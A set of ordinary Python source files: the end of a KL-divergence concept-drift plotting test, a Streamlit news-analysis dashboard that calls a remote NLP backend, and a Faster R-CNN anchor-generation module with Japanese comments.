(window, n_replace, n_threshold, str(do_replace)))
if do_replace:
if False:
logger.debug("window %d: #replace_trees_by_kl: %d\n%s" %
(window, len(replace_trees_by_kl), str(list(replace_trees_by_kl))))
trees_replaced.append(len(replace_trees_by_kl))
model.update_model_from_stream_buffer(replace_trees=replace_trees_by_kl)
# recompute KL replacement threshold *without* p
ref_kls, kl_q_alpha = model.get_KL_divergence_distribution(x, p=None, alpha=alpha)
max_kl = max(max_kl, np.max(ref_kls))
# now recompute reference p
p = model.get_node_sample_distributions(x)
else:
if False:
logger.debug("window %d: model not updated; replace_trees_by_kl: %s" %
(window, str(list(replace_trees_by_kl)) if replace_trees_by_kl is not None else None))
trees_replaced.append(0)
if args.plot:
legend_datasets = None
# legend_datasets = ['ann_thyroid_1v3', 'weather']
xlim = [0, window+1]
ylim = [0, max_kl+3]
dp = DataPlotter(pdfpath="./temp/test_concept_drift_%s.pdf" % args.dataset,
rows=1, cols=1)
pl = dp.get_next_plot()
plt.xlim(xlim)
plt.ylim(ylim)
plt.xlabel('window', fontsize=18)
plt.ylabel('KL-divergence', fontsize=18)
for i in range(window):
ref_label = com_label = threshold_label = replaced_label = None
ref_kls = all_reference_kls[i]
com_kls = all_compare_kls[i]
mkl = max(np.max(ref_kls), np.max(com_kls))
x_coord = i+1
replaced_y_coord = mkl+2
if i == 0:
ref_label = "ref. KL dist"
com_label = "KL-dist w.r.t ref. dist"
threshold_label = "%0.2f-alpha KL" % alpha
replaced_label = "(.) - number of trees replaced"
pl.scatter([x_coord], [replaced_y_coord], color="black", marker=".", s=0, label=replaced_label)
pl.scatter(np.ones(len(ref_kls), dtype=np.float32)*x_coord, ref_kls,
color="orange", marker="*", s=8, label=ref_label)
pl.scatter([x_coord], [all_kl_q_alpha[i]], color="red", marker="+", s=30, label=threshold_label)
pl.scatter(np.ones(len(ref_kls), dtype=np.float32)*x_coord + 0.1, com_kls,
color="green", marker="*", s=8, label=com_label)
pl.text(x_coord-0.2, replaced_y_coord, "(%d)"%trees_replaced[i], fontsize=10, label=replaced_label)
if legend_datasets is None or args.dataset in legend_datasets:
pl.legend(loc='upper left', prop={'size': 14})
dp.close()
if __name__ == "__main__":
test_kl_data_drift()
|
py | 7df808556a70e755db5058e97fe4c9d3d53b05fd | import streamlit as st
import pandas as pd
import spacy_streamlit
import spacy
from spacy import displacy
import requests
from requests.structures import CaseInsensitiveDict
nlp = spacy.load('en_core_web_sm')
def main():
pages = {
"Article Selection": page_second,
"Dashboard": page_third
}
if "page" not in st.session_state:
st.session_state.update({
# Default page
"page": "Article Selection",
# Default widget values
"int": 0,
"options": ["NER","Summarization","Sentiment", "Tokenize"],
"radio": "NER"
})
with st.sidebar:
page = st.radio("Select your page", tuple(pages.keys()))
pages[page]()
def page_second():
st.header("POLITICS")
DATA_URL="https://storage.googleapis.com/storm_event/CNN/CNN_Politics.csv"
data = st.cache(pd.read_csv)(DATA_URL, nrows=1000)
data_pol = data[['title',"datetime"]]
st.write('### Full Dataset', data_pol)
int_val = st.number_input('Select a row for the article', min_value=0, max_value=49, step=1, key="int")
title = st.header(data["title"][int_val])
audio_backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{int_val}/text-to-speech'
audio = process_tts(audio_backend)
if audio:
st.audio(f'https://storage.googleapis.com/storm_event/CNN_audio/politics/{int_val}.mp3', format='audio/ogg')
author = st.write("Author "+data["author"][int_val])
datetime = st.write(data["datetime"][int_val])
body = st.write(data["body"][int_val])
article_url = st.write(data["url"][int_val])
def page_third():
x=st.session_state.int
st.session_state.int = x
DATA_URL="https://storage.googleapis.com/storm_event/CNN/CNN_Politics.csv"
data = st.cache(pd.read_csv)(DATA_URL)
nlp_option = st.radio("Services", st.session_state["options"], key="radio")
if nlp_option=="NER":
st.write("# NER")
doc=nlp(data["body"][x])
spacy_streamlit.visualize_ner(doc,labels=nlp.get_pipe('ner').labels, show_table=False)
if nlp_option=="Tokenize":
st.write("# Text Tokenization")
doc=nlp(data["body"][x])
spacy_streamlit.visualize_tokens(doc, attrs=["text", "pos_", "dep_", "ent_type_"])
if nlp_option=="Sentiment":
st.write("# Sentiment")
backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{x}/sentiment'
sentiment = process_sentiment(backend)
        st.write(sentiment["Sentiment"])
st.write(sentiment["Subjectivity"])
if nlp_option=="Summarization":
st.write("# Summarization")
backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{x}/summarizer'
summarize = process_summarization(backend)
st.write(summarize)
def process_sentiment(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
# headers["Content-Type"] = "application/json"
# valid_text = {
# 'text': input_text
# }
# data = '{"text":'+input_text+'}'
# data = '{"text":"'+text+'"}'
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
result_dict = result['sentiment']
valid_sentiment = result_dict["Sentiment"]
valid_subjectivity = result_dict["dataframe"]["value"]["1"]
return {"Sentiment":valid_sentiment, "Subjectivity":valid_subjectivity}
def process_tts(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
# headers["Content-Type"] = "application/json"
# valid_text = {
# 'text': input_text
# }
# data = '{"text":'+input_text+'}'
# data = '{"text":"'+text+'"}'
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
valid_result = result['Save']
return True if valid_result=="Successful" else False
def process_summarization(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
summ = result["summary"][0]["summary_text"]
return summ
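# --- Editor's note: hedged refactoring sketch (not part of the original app). ---
# The three helpers above repeat the same POST boilerplate; a single generic
# helper such as this one could back all of them. It only relies on the
# endpoints already used above and returns the parsed JSON body.
def _post_json(server_url: str) -> dict:
    headers = CaseInsensitiveDict()
    headers["accept"] = "application/json"
    resp = requests.post(server_url, headers=headers, data='', verify=False, timeout=8000)
    return resp.json()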
if __name__ == "__main__":
main() |
py | 7df808d1bee93d3d0339151f75ded330eb70722f | import numpy as np
from xrcnn.util import bbox as B
class Anchor:
def __init__(self, config):
# def __init__(self, base_size=16,
# anchor_ratios=[
# (1. / math.sqrt(2), 2. / math.sqrt(2)),
# (1., 1.),
# (2. / math.sqrt(2), 1. / math.sqrt(2))],
# anchor_scales=[128 / 4, 256 / 4, 512 / 4],
# backbone_shape=[64 / 4, 64 / 4]):
"""RoI予測の基準となるアンカーを生成する。
アンカーの基準となる値を指定する。
Args:
base_size (number): アンカーを適用する特徴マップ1ピクセルが、入力画像において何ピクセルに値するか。
anchor_ratios (list of float): アンカーのアスペクト比。
:math:`[(h, w), ...]`
anchor_scales (list of numbers): アンカーのサイズ(入力画像におけるサイズ)。
このサイズの正方形をアンカーの領域とする。
anchor_ratios (list of numbers): アンカーのアスペクト比
"""
self.base_size = config.stride_per_base_nn_feature
self.backbone_shape = config.backbone_shape
self.anchor_ratios = config.anchor_box_aspect_ratios
self.anchor_scales = config.anchor_box_scales
self.bbox_refinement_std = config.bbox_refinement_std
self.anchor_base = self._anchor_base(
self.base_size, self.anchor_ratios, self.anchor_scales)
self.anchors = self._generate_anchors(self.backbone_shape)
def generate_gt_offsets(self, bbox_gt, img_size,
pos_iou_thresh=0.5,
neg_iou_thresh=0.3,
n_max_sample=256,
pos_ratio=0.5):
"""anchorにGroud truthなBBoxを適用し、anchor毎に最もIoUが大きいBBoxを特定し、そのBBoxとのオフセットを得る。
IoU値により、各アンカーを以下に分類する。
0.7以上:オブジェクト
→0.5にする。
0.7だとVOCdevkit/VOC2007/Annotations/007325.xmlにあるようなサイズのBboxが
GTとして得られなかったため。
0.3未満:非オブジェクト
それ以外:評価対象外。つまり、トレーニングには使わないアンカー。
Args:
bbox_gt (array): Ground truthなBBox
Its shape is :math:`(R, 4)`.
img_size (h,w): 入力画像の高さと幅のタプル.
pos_iou_thresh: この値以上のIoUをclass=1とする。
pos_iou_thresh: この値未満のIoUをclass=0とする。
n_max_sample: 評価対象とする(classが1or0である)オフセットの上限
pos_ratio: 評価対象サンプル中のPositiveの割合
n_max_sample, pos_ratioは論文中の以下への対応。
考慮無しではNegativeサンプルが支配的になる。学習効率も考慮し、このような処理を行うものと思われる。
Each mini-batch arises from a single image that contains many
positive and negative example anchors. It is possible to
optimize for the loss functions of all anchors,
but this will bias towards negative samples as they are
dominate. Instead, we randomly sample 256 anchors in an image
to compute the loss function of a mini-batch, where the sampled
positive and negative anchors have a ratio of up to 1:1.
If there are fewer than 128 positive samples in an image,
we pad the mini-batch with negative ones.
Returns:
(offsets, obj_flags):
offsets (array) : 各アンカーとGround TruthなBBoxとのオフセット。
Its shape is :math:`(S, 4)`.
2軸目の内容は以下の通り。
(x, y ,h, w)
objects (array): 各アンカーがオブジェクトか否か。
Its shape is :math:`(S, 1)`.
2軸目の内容は以下の通り。
1:オブジェクト
0:非オブジェクト
−1:評価対象外
"""
h, w = img_size
anchor = self.anchors
n_anchor_initial = len(anchor)
        # Exclude anchors that extend beyond the input area
index_inside = np.where(
(anchor[:, 0] >= 0) &
(anchor[:, 1] >= 0) &
(anchor[:, 2] <= h) &
(anchor[:, 3] <= w)
)[0]
anchor = anchor[index_inside]
        # For each anchor, compute the IoU with every GT box and keep the maximum,
        # or any IoU of 0.7 or more.
        # IoU >= 0.7: object candidate (class = 1)
        # IoU < 0.3: non-object candidate (class = 0)
        # any other IoU: ignored (class = -1)
argmax_ious, objects = self._create_label(anchor, bbox_gt,
pos_iou_thresh,
neg_iou_thresh,
n_max_sample,
pos_ratio)
        # Get the offsets between the anchors and the ground truth.
offsets = B.get_offset(anchor, bbox_gt[argmax_ious])
        # Accuracy improvement, matching existing implementations.
offsets /= np.array(self.bbox_refinement_std)
        # Restore the original shape:
        # the first axis, reduced to index_inside, is expanded back to n_anchor_initial.
        # The restored entries are not evaluated, so mark them invalid with label -1 and offset 0.
objects = self._unmap(objects, n_anchor_initial, index_inside, fill=-1)
offsets = self._unmap(offsets, n_anchor_initial, index_inside, fill=0)
return offsets, objects
def _create_label(self, anchor, bbox, pos_iou_thresh, neg_iou_thresh,
n_max_sample, pos_ratio):
"""
anchorとbboxのIoUを算出し、それぞれオブジェクト候補か否かを得る。
IoU >= 0.7はオブジェクト候補とする(class = 1)
IoU < 0.3は非オブジェクト候補とする(class = 0)
それ以外のIoUは評価対象外とする(class = -1)
anchor毎に全bboxについてのIoUを算出する。
つまり、(len(anchor), len(bbox))のマトリクスになる。
このマトリクスから、anchor毎に最大のIoUを含むbboxのindexを得る。
Args:
anchor (tensor): アンカー
Its shape is :math:`(R, 4)`.
bbox (tensor): Ground truthなBBox
Its shape is :math:`(S, 4)`.
pos_iou_thresh: この値以上のIoUをclass=1とする。
pos_iou_thresh: この値未満のIoUをclass=0とする。
n_max_sample: 評価対象とする(classが1or0である)オフセットの上限
pos_ratio: 評価対象サンプル中のPositiveの割合
Returns:
(index_max_iou_per_anchor, label)
index_max_iou_per_anchor: anchor毎のIoUが最大となるbboxのIndex。
Its shape is :math:`(R, 1)`.
label:anchor毎のオブジェクト/非オブジェクト
Its shape is :math:`(R, 1)`.
"""
        # Initialize with -1 (ignored)
label = np.full((len(anchor)), -1)
        # For each anchor, get the column index of the bbox with the largest IoU and
        # its value, plus the indices of the anchors that hold the overall maximum IoU.
index_max_iou_per_anchor, max_ious, gt_argmax_ious = self._calc_ious(
anchor, bbox)
        # Anchors holding the maximum IoU are positive
label[gt_argmax_ious] = 1
        # IoU at or above the threshold is positive
label[max_ious >= pos_iou_thresh] = 1
        # IoU below the threshold is negative
label[max_ious < neg_iou_thresh] = 0
        # Cap the number of positive samples at the limit
n_pos_max = int(pos_ratio * n_max_sample)
pos_index = np.where(label == 1)[0]
if len(pos_index) > n_pos_max:
            # If there are more than n_pos_max, randomly mark surplus positives as ignored
disable_index = np.random.choice(
pos_index, size=(len(pos_index) - n_pos_max), replace=False)
label[disable_index] = -1
        # Similarly cap the number of negative samples
n_neg = n_max_sample - np.sum(label == 1)
neg_index = np.where(label == 0)[0]
if len(neg_index) > n_neg:
disable_index = np.random.choice(
neg_index, size=(len(neg_index) - n_neg), replace=False)
label[disable_index] = -1
return index_max_iou_per_anchor, label
def _calc_ious(self, anchor, bbox):
        # Get the IoU of each anchor with every bbox.
ious = B.get_iou(anchor, bbox)
        # Get the column index holding the largest IoU for each anchor.
argmax_ious = ious.argmax(axis=1)
        # Get the values at the indices in argmax_ious, i.e. the largest IoU per anchor.
max_ious = ious[np.arange(ious.shape[0]), argmax_ious]
        # Identify the indices of the anchors holding the maximum IoU.
        # The lines below are the chainercv implementation, but with it anchors whose
        # IoU with every bbox is 0 also seem to end up in gt_argmax_ious, i.e. they
        # would all be treated as positive. Following the paper, only the anchors
        # with the maximum IoU are selected.
# gt_argmax_ious = ious.argmax(axis=0)
# gt_max_ious = ious[gt_argmax_ious, np.arange(ious.shape[1])]
# gt_argmax_ious = np.where(ious == gt_max_ious)[0]
gt_argmax_ious = np.where(ious == ious.max())[0]
return argmax_ious, max_ious, gt_argmax_ious
def _unmap(self, data, count, index, fill=0):
        # Restore the original shape.
if len(data.shape) == 1:
ret = np.empty((count,), dtype=data.dtype)
ret.fill(fill)
ret[index] = data
else:
ret = np.empty((count,) + data.shape[1:], dtype=data.dtype)
ret.fill(fill)
ret[index, :] = data
return ret
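    # Editor's note (hedged numeric example, not in the original): with
    # count=5, index=[1, 3], fill=-1 and data=[10, 20], _unmap returns
    # [-1, 10, -1, 20, -1], i.e. data is scattered back to its original positions.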
def _generate_anchors(self, feature_shape):
"""特徴マップの各ピクセル毎のアンカーを生成する。
Args:
feature_shape: 特徴マップの高さと幅のタプル
(h, w)
Returns:
ndarray
形状は以下の通り。
(len(feature_height) * len(feature_width)
* len(self.anchor_ratios) * len(self.anchor_scales), 4)
1軸目は「特徴マップの行」→「特徴マップの列」→「アスペクト比の順」→「アンカーサイズ」で並ぶ。
例:
2軸目に格納される座標の形状は以下の通り。
: math: `(y_{min}, x_{min}, y_{max}, x_{max})`
"""
feature_height, feature_width = feature_shape
        # Grid-point coordinates covering every pixel of the feature map
shift_y = np.arange(0, feature_height * self.base_size, self.base_size)
shift_x = np.arange(0, feature_width * self.base_size, self.base_size)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
        # The anchors per grid point are obtained by adding self.anchor_base at each
        # grid point, so first compute the base coordinates of every grid point.
shift = np.stack((shift_y.flatten(), shift_x.flatten(),
shift_y.flatten(), shift_x.flatten()), axis=1)
        # With np.arange(0, 5, 1) this looks as follows:
# >>> shift_y
# array([[0, 0, 0, 0, 0],
# [1, 1, 1, 1, 1],
# [2, 2, 2, 2, 2],
# [3, 3, 3, 3, 3],
# [4, 4, 4, 4, 4]])
# >>> shift_x
# array([[0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4]])
# >>> shift
# array([[0, 0, 0, 0],
# [0, 1, 0, 1],
# [0, 2, 0, 2],
# [0, 3, 0, 3],
# [0, 4, 0, 4],
# [1, 0, 1, 0],
# [1, 1, 1, 1],
# [1, 2, 1, 2],
# [1, 3, 1, 3],
# [1, 4, 1, 4],
# [2, 0, 2, 0],
# [2, 1, 2, 1],
# [2, 2, 2, 2],
# [2, 3, 2, 3],
# [2, 4, 2, 4],
# [3, 0, 3, 0],
# [3, 1, 3, 1],
# [3, 2, 3, 2],
# [3, 3, 3, 3],
# [3, 4, 3, 4],
# [4, 0, 4, 0],
# [4, 1, 4, 1],
# [4, 2, 4, 2],
# [4, 3, 4, 3],
# [4, 4, 4, 4]])
n_a = self.anchor_base.shape[0]
n_s = shift.shape[0]
        # Compute the anchor coordinates for each grid point.
        # First adjust the dimensions for that:
        # reshape to (feature_height * feature_width, 1, 4).
        # For the 5*5 example above this is (25, 1, 4).
shift = np.transpose(np.reshape(shift, (1, n_s, 4)), (1, 0, 2))
        # Reshape to (1, len(self.anchor_ratios) * len(self.anchor_scales), 4).
        # For the 5*5 example above this is (1, 9, 4).
anchor = np.reshape(self.anchor_base, (1, n_a, 4))
        # shift + anchor yields every combination of shift[n, :, :] and anchor[:, k, :],
        # i.e. the result of adding anchor_base at every grid point.
        # The resulting tensor has shape
        # (feature_height * feature_width,
        #  len(self.anchor_ratios) * len(self.anchor_scales), 4).
        # For the 5*5 example above this is (25, 9, 4).
anchor = shift.astype(float) + anchor
        # Finally reshape the above to
        # (feature_height * feature_width
        #  * len(self.anchor_ratios) * len(self.anchor_scales), 4).
anchor = np.reshape(anchor, (n_s * n_a, 4))
return anchor.astype('float32')
def _anchor_base(self, base_size, anchor_ratios, anchor_scales):
"""基準となるアンカーを生成する。
ratiosとanchor_scales毎にアンカーを示す座標(矩形の左上と右下の座標)を返す。
矩形の中心は(base_size / 2, base_size / 2)とする。(論文に合わせ、受容野の中心とする)
Args:
base_size(number): アンカーを適用する特徴マップ1ピクセルが、入力画像において何ピクセルに値するか。
anchor_ratios(list of float): アンカーのアスペクト比。
: math: `[(h, w), ...]`
anchor_scales(list of numbers): アンカーのサイズ(入力画像におけるサイズ)。
このサイズの正方形をアンカーの領域とする。
Returns:
numpy配列
形状は以下の通り。
(len(anchor_ratios) * len(anchor_scales), 4)
2軸目に格納される座標の形状は以下の通り。
: math: `(y_{min}, x_{min}, y_{max}, x_{max})`
"""
        # Specify the center of the receptive field
py = base_size / 2.
px = base_size / 2.
anchor_base = np.zeros((len(anchor_ratios) * len(anchor_scales), 4),
dtype=np.float32)
for i in range(len(anchor_ratios)):
for j in range(len(anchor_scales)):
h = anchor_scales[j] * anchor_ratios[i][0]
w = anchor_scales[j] * anchor_ratios[i][1]
index = i * len(anchor_scales) + j
                # Top-left corner of the rectangle
anchor_base[index, 0] = py - h / 2.
anchor_base[index, 1] = px - w / 2.
                # Bottom-right corner of the rectangle
anchor_base[index, 2] = py + h / 2.
anchor_base[index, 3] = px + w / 2.
return anchor_base.astype('float32')
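# --- Editor's note: hedged worked example (not part of the original module). ---
# With base_size=16, anchor_ratios=[(1., 1.)] and anchor_scales=[32], _anchor_base
# yields a single 32x32 box centered on (8, 8):
#     (y_min, x_min, y_max, x_max) = (8 - 16, 8 - 16, 8 + 16, 8 + 16) = (-8, -8, 24, 24)
# _generate_anchors then shifts this box by base_size per feature-map cell, so a
# backbone shape of (H, W) produces H * W * len(ratios) * len(scales) anchors.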
|